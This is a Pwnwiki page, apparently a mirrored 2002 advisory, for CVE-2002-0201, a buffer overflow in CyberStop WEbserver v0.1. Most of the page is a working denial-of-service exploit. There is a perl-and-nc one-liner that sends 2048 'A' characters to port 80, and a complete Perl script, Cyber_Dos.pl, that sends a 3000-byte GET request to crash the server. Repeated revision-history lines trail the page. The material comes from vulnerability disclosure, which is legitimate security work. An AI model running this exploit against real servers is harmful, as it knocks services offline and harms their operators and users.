Pwnwiki: Created page with "==INFO==

 ------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------  CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities  which allow..."

2021-03-31T06:47:31Z

Created page with "==INFO== <pre> ------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------ CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow..."

New page

==INFO==
<pre>
------oOo------
CyberStop WEbserver DoS Remote attacks.
------oOo------

CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities
which allow users to attack remote services on the server.
Exploit information included.

Company Affected: www.cyberstop.com.sg
Download: http://www.cyberstop.com.sg/webserver/webserver.zip
Version: v0.1
Date Added: 12-DIC-01
Size: 2.84 MB
OS Affected: Windows ALL.

Author:

** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins
** G.Maggiotti & H.Oliveira.

----=[Brief Description]=------------

Proof Of concept

# uname -a
SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
#

# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 80
#

Exist a service named "Proyect1" and may be u can reading something
like this on Windows Server:

"Run-time error 40006":
Wrong protocol or connection state for the request transaction or
request.

"Run-time error "5":
Invalid procedure call or argument.

Crash system and the admin need restart the service!.

------oOo------------------------------------
Vendor Response:
The vendor was notified
help@cyberstopasia.com
http://www.cyberstop.com.sg
Patch Temporary: No Data of vendor.

Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.

------oOo------------------------------------
</pre>

==Cyber_Dos.pl==
<pre>
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the server crashing.
#
# CyberStop WEbserver v0.1 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Cyber_DoS.pl -s <server>
#
# Example:
#
# perl -x Cyber_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "3000";
$data .= $def x $num;
$serv = $args{s};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("\nCrash was successful !\n\n");

sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
</pre>

CVE-2002-0201 Cyberstop Web緩衝區溢出漏洞 - Revision history

Pwnwiki: Created page with "==INFO==
------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------ CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow..."

CVE-2002-0201 Cyber​​stop Web緩衝區溢出漏洞 - Revision history

Pwnwiki: Created page with "==INFO== ------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------ CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow..."

CVE-2002-0201 Cyberstop Web緩衝區溢出漏洞 - Revision history

Pwnwiki: Created page with "==INFO==
------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------ CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow..."